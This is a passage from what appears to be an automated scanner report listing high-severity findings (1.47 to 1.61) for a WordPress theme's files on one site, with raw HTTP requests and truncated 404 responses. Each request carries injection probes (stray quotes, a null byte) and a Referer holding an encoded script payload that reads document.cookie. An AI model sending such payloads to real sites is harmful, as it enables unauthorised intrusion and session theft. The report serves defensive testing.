<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.47. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/wp.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.48. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.49. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/wp.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:40 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.50. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

Request

GET /wp-content'/themes/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.51. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

Request

GET /wp-content/themes'/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.52. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp'/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.53. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js'/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:37 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.54. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.55. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:27 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.56. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:31 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.57. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

Request

GET /wp-content'/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:59 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.58. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

Request

GET /wp-content/themes'/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.59. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp'/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:22 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.60. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js'/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.61. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox'/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:45 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
